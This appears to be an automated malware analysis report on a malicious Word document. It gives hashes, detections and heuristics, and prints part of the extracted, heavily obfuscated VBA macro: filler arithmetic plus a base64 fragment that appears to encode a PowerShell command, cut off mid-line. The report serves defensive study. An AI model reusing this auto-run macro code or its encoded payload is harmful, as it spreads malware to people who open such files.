Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a5509b36a9b9f001…

MALICIOUS

Office (OLE)

Size: 226.4 KB · Created: 2019-03-15 21:12:00 · Authoring application: Microsoft Office Word · First seen: 2021-09-25
MD5: 41f82f403e1752afcf061004a73212df
SHA-1: 7fdf8cfe5b2dd176e261e8c09538b153e26bd250
SHA-256: a5509b36a9b9f001b6ec7abf32474ea8f71e3d79df8567e19b2bb3b30009deee
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

ClamAV identifies the file as malicious, and it contains VBA macros, including an AutoOpen macro that runs automatically when the document is opened. A GetObject call present in the VBA p-code suggests an attempt to execute code, most likely to download and run a second-stage payload. Because the VBA source is heavily obfuscated, its specific actions could not be determined in more detail by static analysis.

Heuristics (6)

  • ClamAV: Doc.Malware.Droo-6896835-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Droo-6896835-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is a standard OOXML schema namespace identifier, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60289 bytes
SHA-256: 1d105597f7e784cb68577ec72fa5622ceae4f1b9f9796e020640ba6bbdaa6f01
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BQxQAZAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Header of the document module (VB_Base = "1Normal.ThisDocument", VB_PredeclaredId = True).
' No procedures appear under this header in the extracted text; the module name is a
' random-looking token, consistent with the obfuscation the report describes.
' The extracted artifact concatenates more than one module: a second header follows.

Attribute VB_Name = "lDUAAAoA"
' Second module header; the procedures printed after it (z1AC4_A, R1AoXcU, ...) appear
' to belong to this module. No Option Explicit line is visible in the extracted source,
' so the undeclared names used below would compile as Variants — TODO confirm against the
' full extraction.
Function z1AC4_A()
   ' Filler routine: six identically shaped blocks, each comparing two names that are
   ' never assigned anywhere in the visible source, then assigning arithmetic over more
   ' never-assigned names and numeric literals (using the built-in Tan, Oct, Hex and Sqr).
   ' None of the assigned names is read elsewhere in the visible source, and the function
   ' never sets its own return value, so this appears to be obfuscation padding meant to
   ' bulk up the module and frustrate signature/heuristic matching — TODO confirm; no
   ' caller is visible in this excerpt.
   ' Unlike R1AoXcU below, there is no On Error Resume Next here, so any runtime error
   ' raised by these Variant expressions would propagate to the caller.
   If kCDwBk = KAQQUZ Then
       XAwcCCA = 807140381 * TD1AXAA4
       nAQA1DD = tQocAAX / 633834143 / 37006607 + 239929723 * 754512655 / 871966521 + (oACCAcA4 - Tan(do11ZG + 855296266 - 577802744 - Oct(jAZUZkc - Hex(788374768) + 890738880 + Oct(349146867))) + (477289878 / Sqr(579910016)))
       ncAkAUD = 277580615 * WAAAkDU
End If
   If iAUAAoBA = pZ4oZ1 Then
       BBoUQAk = 508592674 * ixZ1DZo
       WAAAZAD = s4Uko_ / 625922695 / 63763153 + 30750925 * 948672253 / 976040757 + (GQkAoU - Tan(EcAQAA + 220458743 - 51280665 - Oct(UAAA_A - Hex(545446455) + 148057455 + Oct(11176011))) + (674452369 / Sqr(311294999)))
       jCwxAGwQ = 673436255 * o4ZABA
End If
   If iBUABAZ = lBZAxA Then
       sUA4wA = 364649697 * QUUkAAAA
       NccAAx = zBDQCA / 164862735 / 797063330 + 825739780 * 911211470 / 917698242 + (BQBDDA - Tan(boQBAA1 + 872297686 - 66724995 - Oct(QZDUDQA - Hex(384780563) + 944842147 + Oct(519499904))) + (208935311 / Sqr(738535774)))
       EA_kwA = 208128765 * YcAcoABA
End If
   If zAAAZDA = sUkDZA Then
       uX4AUQ = 534212628 * hwDAQG
       aoBUA1D = OAZAAUZ / 57189296 / 32101116 + 569520364 * 297760706 / 931064337 + (KxwAwCoD - Tan(tcXCU_oA + 865955269 - 63009569 - Oct(UkwQBDZ - Hex(105530356) + 844234208 + Oct(565702656))) + (267762147 / Sqr(912056685)))
       LBkBQCAQ = 295431747 * bABGAAX
End If
   If uCAAAA = pCZAAA Then
       hkAUZA = 451088644 * rAQDQ4A
       J_AAowA = HAAXDUA / 278163905 / 194579321 + 191353584 * 212533361 / 544317322 + (hwADowx - Tan(XDADkAww + 944129522 - 310343675 - Oct(M_ACUA - Hex(509784722) + 418391608 + Oct(623713806))) + (678751379 / Sqr(903281591)))
       ND_Boc_A = 76635001 * ixQCCcAw
End If
   If ucDkUC = SQAAxAk Then
       WABkAAAQ = 461516306 * BwQoA4
       SAwx_A_4 = tBAU__cA / 123512461 / 822377604 + 552203938 * 364946267 / 321865355 + (HDAxA4 - Tan(UQAwADZ + 615469506 - 813429054 - Oct(icwAA1oo - Hex(472650998) + 610244657 + Oct(155235874))) + (988403145 / Sqr(942477152)))
       RAA4ADAD = 671427848 * NBDAwA
End If
End Function
Function R1AoXcU()
On Error Resume Next
If ZZGCk1 = JDD__AA Then
       woZ4o4wU = 521969686 * QAUBAAU4
       u_AAGCU = sAZAcwUA / 606752164 / 880632365 + 442418111 * 544390013 / 604209456 + (GkcZQA - Tan(KADABXX + 655868125 - 527487444 - Oct(OUAAUAwD - Hex(92131595) + 728374417 + Oct(524104891))) + (990784962 / Sqr(287209824)))
       PQcXBA_ = 612878388 * uAo_UwAw
End If
   If NUXA4UA = OBZAZZ Then
       TAkUAD = 157424435 * zAAkwA
       rAA1AA1 = WAoAoB_B / 494891308 / 328545142 + 592800891 * 215982215 / 338932341 + (TQACAc - Tan(JAADoAAA + 843099940 - 990622244 - Oct(F_wD_Q1 - Hex(722506656) + 325570329 + Oct(733723383))) + (405494320 / Sqr(506348481)))
       vDADAxU = 139631113 * L_4CAX
End If
   If NACBAZx = bwAAxA Then
       AABABoc = 680879815 * nAA4Zx
       mBG_CU = zCcXAU / 245224203 / 968817610 + 43839049 * 401417920 / 548907961 + (TcAZ1A1Q - Tan(B4CUZUBA + 138840255 - 547002862 - Oct(AUAADQ_B - Hex(111856662) + 464260225 + Oct(80207357))) + (372202813 / Sqr(350495293)))
       wA_AUAw = 953983284 * kAA_DUBA
End If
QwBoAA1 = "IAAmACAAKAAgACQAVgBlAFIAQgBvAFMAZQBwAFIAZQBGAGUAcgBFAE4AQwBlAC4AdABPAFMAVABSAGkA"
If PkQADAUC = SQCoUA Then
       ECAUUw = 346384682 * IQoQQG
       XDAUUA = CAA_AA / 152765075 / 745169039 + 354184191 * 747794806 / 56014307 + (VQAAoQU - Tan(qDAGAGD + 615466887 - 671128934 - Oct(VAAABA - Hex(904113250) + 396352631 + Oct(147568243))) + (428728107 / Sqr(800175746)))
       fAB4DQ = 918030212 * h4AABxZ
End If
   If iAAAAAZ = JoAAkAx Then
       CAwDCAAD = 275221804 * fUBBUAQ
       OQxAZDC = uwxGAxU / 144038732 / 306093381 + 124742707 * 731845568 / 69384276 + (KAcZADUD - Tan(ZGZAABo + 229036077 - 149838956 - Oct(EDC_QAB 
... (truncated)